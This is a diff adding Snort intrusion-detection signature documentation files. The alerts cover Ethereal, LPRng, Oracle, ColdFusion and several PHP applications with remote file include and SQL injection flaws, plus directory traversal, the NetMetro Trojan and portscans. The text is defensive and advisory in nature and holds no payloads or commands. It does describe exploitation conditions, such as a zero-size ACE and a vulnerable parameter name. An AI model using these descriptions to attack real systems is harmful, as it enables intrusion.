--- /dev/null
+++ b/doc/signatures/3043.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3043
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1599.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1599
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/301.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 301
+
+--
+Summary:
+This event is generated when an attempt is made to escalate privileges remotely using a vulnerability in LPRng.
+
+--
+Impact:
+System compromize presenting the attacker with escalated system privileges .
+
+--
+Detailed Information:
+LPRng is an implementation of the Berkeley lpr print spooling protocol. Some versions are vulnerable to a format-string attack that takes advantage of a bug in the syslog() wrapper. Successfull exploitation may present a remote attacker with the ability to execute arbitrary code using the privileges of the LPD daemon owner (typically root).
+
+Arbitrary addresses in the lpd process address space can be overwritten by sending specially crafted packets to the LPRng daemon listening on port 515 to execute arbitrary code or generate a segmentation violation.
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disallow access to LPRng port 515 from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1712
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0917
+
+--
--- /dev/null
+++ b/doc/signatures/3456.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+3456
+
+-- 
+
+Summary: 
+This event is generated when the user "root" logs in to a MySQL database from an external source.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when someone using the name "root" logs in to a MySQL database.
+
+The 'root' user may have access to all databases on the system, with full privileges to add users, delete data, add information, etc.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. The user logs in with the username 'root', full access is then granted to that user for all databases served by the MySQL daemon. The attacker may then continue to gain sensitive information from any database in the system.
+
+-- 
+
+Ease of Attack: 
+Simple. This may be post-attack behavior and can be indicative of the successful exploitation of a vulnerable system.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in as the root user from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2019.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2019
+
+--
+Summary:
+The RPC service mountd enables clients to connect to networked file 
+dismounted via UDP.
+
+--
+Impact:
+Denial of network resources to users on the local area network.
+
+--
+Detailed Information:
+This may be an attempt to deny access to network resources from an 
+unauthorized source. It may also be indicative of an attacker probing 
+for RPC services on a host in an attempt to discover a possible entry 
+point to network resources via a vulnerable daemon.
+
+--
+Affected Systems:
+All systems allowing network shares to be unmounted by anonymous hosts, 
+all systems allowing RPC services to be stopped by ordinary users and 
+systems already compromised by an attacker via another vulnerability.
+
+--
+Attack Scenarios:
+This is an intelligence gathering activity, the attacker could remotely 
+unmount a shared resource to deny a resource to the local area network 
+or a probe to discover possible routes of entry into a system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+When allowing hosts to mount an external network share, consider using a
+hosts.allow file.
+
+Do not allow shares to be unmounted by unauthorized hosts or users.
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/159.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+159
+
+--
+Summary:
+This event is generated when an attempt is made to list files on a host infected with the NetMetro Trojan Horse.
+
+--
+Impact:
+Limited control of the target host.
+
+--
+Detailed Information:
+Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+The server portion opens TCP port 5031 by default to establish a connection between client and server.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named NMS.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+A reboot of the infected machine is recommended. The Trojan does not start automatically at boot time nor does it change any system registry settings.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS79
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/NetMetro/index.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000627.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000627
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "message_send.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"message_send.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1119.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1119
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1417.txt
@@ -0,0 +1,77 @@
+Rule:
+  
+--
+Sid:
+1417
+
+--
+
+Summary:
+This event is generated when an SNMP-Trap connection over UDP to an SNMP
+daemon is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+The SNMP (Simple Network Management Protocol) Trap daemon usually 
+listens on port 161, tcp or udp.
+
+An attacker may attempt to send this request to determine if a device is
+using SNMP.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons on well known ports.
+
+--
+
+Attack Scenarios:
+An attacker sends a packet directed to udp port 161, if sucessful a 
+reply is generated and the attacker may then launch further attacks 
+against the SNMP daemon.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Use a packet filtering firewall to protect devices using the SNMP 
+protocol and only allow connections from well-known hosts.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+
+
+--
--- /dev/null
+++ b/doc/signatures/122-7.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-7
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+filtered portsweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2864.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2864
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_raw
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000734.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000734
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "MassDelete.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "MassDelete.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000513.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000513
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "SAPHPLesson" application running on a webserver. Access 
+to the file "showcat.php" with SQL commands being passed as the "forumid" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "forumid" parameter in the "showcat.php" script used by 
+the "SAPHPLesson" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SAPHPLesson
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1501.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1501
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1248.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1248
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000509.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000509
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "RahnemaCo" application running on a webserver. 
+Access to the file "page.php" using a remote file being passed as the "pageid" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "pageid" parameter in the "page.php" script used by the 
+"RahnemaCo" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using RahnemaCo
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/440.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+
+Sid:
+440
+
+--
+
+Summary:
+This event is generated when an ICMP Type 19 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 19 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 19 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 19 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/899.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+899
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/926.txt
@@ -0,0 +1,62 @@
+SID:
+926
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/1563.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1563
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1514.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1514
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
